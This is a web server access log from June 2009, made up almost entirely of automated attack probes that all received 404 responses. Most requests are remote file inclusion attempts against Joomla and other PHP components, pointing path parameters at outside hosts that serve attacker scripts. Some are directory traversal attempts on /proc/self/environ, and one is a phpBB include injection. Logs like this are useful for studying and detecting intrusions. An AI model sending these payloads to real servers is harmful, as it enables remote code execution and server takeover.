195.34.78.110 - - [20/Jun/2009:03:05:33 -0400] "GET /logs/access_log.Q109060100//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:03:05:54 -0400] "GET /index.php?pag=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:03:05:55 -0400] "GET /logs/access_log.Q109061000%20%20/index.php?pag=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:03:05:55 -0400] "GET /logs/index.php?pag=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
124.217.216.86 - - [20/Jun/2009:03:06:35 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 301 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
203.94.155.59 - - [20/Jun/2009:03:06:53 -0400] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:03:06:53 -0400] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:03:06:53 -0400] "GET /logs/access_log.Q109061200//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:03:06:54 -0400] "GET //configuration.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:03:06:54 -0400] "GET /logs//configuration.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:03:06:54 -0400] "GET /logs/access_log.Q109052900//configuration.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
121.165.73.157 - - [20/Jun/2009:03:07:22 -0400] "GET /logs/access_log.Q109050700//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.165.73.157 - - [20/Jun/2009:03:07:22 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.165.73.157 - - [20/Jun/2009:03:07:22 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
203.94.155.59 - - [20/Jun/2009:03:08:06 -0400] "GET /logs/access_log.Q109060600//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
78.40.226.135 - - [20/Jun/2009:03:08:26 -0400] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
78.40.226.135 - - [20/Jun/2009:03:08:26 -0400] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
78.40.226.135 - - [20/Jun/2009:03:08:26 -0400] "GET /logs/access_log.Q109061200//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
78.40.226.135 - - [20/Jun/2009:03:08:27 -0400] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
78.40.226.135 - - [20/Jun/2009:03:08:27 -0400] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
78.40.226.135 - - [20/Jun/2009:03:08:27 -0400] "GET /logs/access_log.Q109061200//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
78.40.226.135 - - [20/Jun/2009:03:08:59 -0400] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://yildizmotor.net/images/header.jpg?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
78.40.226.135 - - [20/Jun/2009:03:08:59 -0400] "GET /logs/access_log.Q109061200//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://yildizmotor.net/images/header.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
78.40.226.135 - - [20/Jun/2009:03:08:59 -0400] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://yildizmotor.net/images/header.jpg?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
78.40.226.135 - - [20/Jun/2009:03:09:22 -0400] "GET /logs/access_log.Q109060600//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
78.40.226.135 - - [20/Jun/2009:03:09:22 -0400] "GET /logs/access_log.Q109060600//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:03:09:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.222.193.94 - - [20/Jun/2009:03:09:46 -0400] "GET /logs/access_log.Q109060500/index.php?pag=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
78.40.226.135 - - [20/Jun/2009:03:09:49 -0400] "GET /logs/access_log.Q109060600//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://yildizmotor.net/images/header.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
121.165.73.157 - - [20/Jun/2009:03:10:08 -0400] "GET /logs/access_log.Q109053000//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
217.147.29.190 - - [20/Jun/2009:03:11:09 -0400] "GET /logs/access_log.Q109052800//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
217.147.29.190 - - [20/Jun/2009:03:11:09 -0400] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
217.147.29.190 - - [20/Jun/2009:03:11:09 -0400] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:03:11:35 -0400] "GET /logs/access_log.Q109060500/index.php?pag=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.249.71.54 - - [20/Jun/2009:03:12:13 -0400] "GET /images/over-index4_ipctair.jpg HTTP/1.1" 200 1435 "-" "Googlebot-Image/1.0"
78.40.226.135 - - [20/Jun/2009:03:12:22 -0400] "GET /logs/access_log.Q109061200%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:03:12:27 -0400] "GET /logs/access_log.Q109061000/index.php?pag=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:03:12:36 -0400] "GET /logs/access_log.Q109061200%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:03:12:42 -0400] "GET /logs/access_log.Q109060600%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
78.40.226.135 - - [20/Jun/2009:03:12:45 -0400] "GET /logs/access_log.Q109060600%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
217.116.84.254 - - [20/Jun/2009:03:13:36 -0400] "GET /logs//errors.php?error=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
217.116.84.254 - - [20/Jun/2009:03:13:36 -0400] "GET /logs/access_log.Q109052400//errors.php?error=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
121.165.73.157 - - [20/Jun/2009:03:13:58 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.165.73.157 - - [20/Jun/2009:03:13:58 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.165.73.157 - - [20/Jun/2009:03:13:58 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
83.222.193.94 - - [20/Jun/2009:03:14:05 -0400] "GET /logs/access_log.Q109061000/index.php?pag=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
217.147.29.190 - - [20/Jun/2009:03:14:07 -0400] "GET /logs/access_log.Q109052800%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
200.101.192.223 - - [20/Jun/2009:03:14:20 -0400] "GET /logs/access_log.Q109061000//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.macwireless.com/help01.txt??? HTTP/1.1" 404 301 "-" "libwww-perl/5.76"
200.101.192.223 - - [20/Jun/2009:03:14:20 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.macwireless.com/help01.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.76"
200.101.192.223 - - [20/Jun/2009:03:14:20 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.macwireless.com/help01.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.76"
200.101.192.223 - - [20/Jun/2009:03:14:28 -0400] "GET /logs/access_log.Q109050700//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.macwireless.com/help01.txt??? HTTP/1.1" 404 301 "-" "libwww-perl/5.76"
217.116.84.254 - - [20/Jun/2009:03:14:28 -0400] "GET /logs/access_log.Q109053100//errors.php?error=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
121.165.73.157 - - [20/Jun/2009:03:14:28 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
209.59.12.99 - - [20/Jun/2009:03:14:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.165.73.157 - - [20/Jun/2009:03:14:38 -0400] "GET /logs/access_log.Q109050300//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
203.94.155.59 - - [20/Jun/2009:03:15:03 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kpeoplepower21.org/nalog/readme.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
203.94.155.59 - - [20/Jun/2009:03:15:03 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kpeoplepower21.org/nalog/readme.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
203.94.155.59 - - [20/Jun/2009:03:15:03 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kpeoplepower21.org/nalog/readme.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
203.94.155.59 - - [20/Jun/2009:03:15:29 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kpeoplepower21.org/nalog/readme.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
203.94.155.59 - - [20/Jun/2009:03:15:29 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kpeoplepower21.org/nalog/readme.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
203.94.155.59 - - [20/Jun/2009:03:15:29 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kpeoplepower21.org/nalog/readme.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
207.210.89.18 - - [20/Jun/2009:03:15:42 -0400] "GET /logs/index.php?stranica=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
207.210.89.18 - - [20/Jun/2009:03:15:42 -0400] "GET /index.php?stranica=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
207.210.89.18 - - [20/Jun/2009:03:15:42 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
207.210.89.18 - - [20/Jun/2009:03:15:42 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
207.210.89.18 - - [20/Jun/2009:03:15:42 -0400] "GET /logs/index.php?stranica=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 212 "-" "XXXXXX"
207.210.89.18 - - [20/Jun/2009:03:15:42 -0400] "GET /index.php?stranica=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 207 "-" "XXXXXX"
207.210.89.18 - - [20/Jun/2009:03:15:42 -0400] "GET /logs/index.php?stranica=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "XXXXXX"
207.210.89.18 - - [20/Jun/2009:03:15:42 -0400] "GET /index.php?stranica=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "XXXXXX"
210.109.101.217 - - [20/Jun/2009:03:17:05 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.wfc.edu.tw/~ecsec/counter/images/cok.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
210.109.101.217 - - [20/Jun/2009:03:17:05 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.wfc.edu.tw/~ecsec/counter/images/cok.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
210.109.101.217 - - [20/Jun/2009:03:17:05 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.wfc.edu.tw/~ecsec/counter/images/cok.txt%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
210.109.101.217 - - [20/Jun/2009:03:17:27 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kpeoplepower21.org/nalog/readme.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
210.109.101.217 - - [20/Jun/2009:03:17:27 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kpeoplepower21.org/nalog/readme.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
210.109.101.217 - - [20/Jun/2009:03:17:27 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kpeoplepower21.org/nalog/readme.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
78.40.226.135 - - [20/Jun/2009:03:17:34 -0400] "GET /logs/access_log.Q109061200%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
78.40.226.135 - - [20/Jun/2009:03:17:53 -0400] "GET /logs/access_log.Q109060600%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:03:18:36 -0400] "GET /logs/access_log.Q109060800//configuration.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:03:18:42 -0400] "GET /logs/access_log.Q109060100//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:03:18:46 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kpeoplepower21.org/nalog/readme.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
203.94.155.59 - - [20/Jun/2009:03:18:46 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kpeoplepower21.org/nalog/readme.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
203.94.155.59 - - [20/Jun/2009:03:18:47 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kpeoplepower21.org/nalog/readme.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
83.222.193.94 - - [20/Jun/2009:03:19:24 -0400] "GET /logs/access_log.Q109051100/index.php?lg=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:03:19:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.222.193.94 - - [20/Jun/2009:03:19:46 -0400] "GET /logs/access_log.Q109051100/index.php?lg=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:03:20:34 -0400] "GET /logs/access_log.Q109061100/index.php?lg=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:03:20:46 -0400] "GET /logs/access_log.Q109061100/index.php?lg=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:03:20:49 -0400] "GET /logs/access_log.Q109060500//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
208.71.89.180 - - [20/Jun/2009:03:21:14 -0400] "GET //errors.php?error=http://www.stmaryofthecataract.com/images/save.jpg? HTTP/1.1" 404 209 "-" "libwww-perl/5.811"
210.8.66.19 - - [20/Jun/2009:03:21:35 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:03:21:35 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:03:21:35 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:03:21:37 -0400] "GET /logs/access_log.Q109060100//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:03:22:07 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:03:22:07 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:03:22:07 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:03:23:48 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:03:23:48 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:03:23:48 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:03:24:03 -0400] "GET /logs/access_log.Q109060200//modules/vwar/admin/admin.php?vwar_root=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:03:24:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.98.209.71 - - [20/Jun/2009:03:25:25 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:03:25:25 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:03:25:25 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:03:25:35 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:03:25:50 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:03:26:21 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:03:27:33 -0400] "GET /logs/access_log.Q109060600//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:03:27:45 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
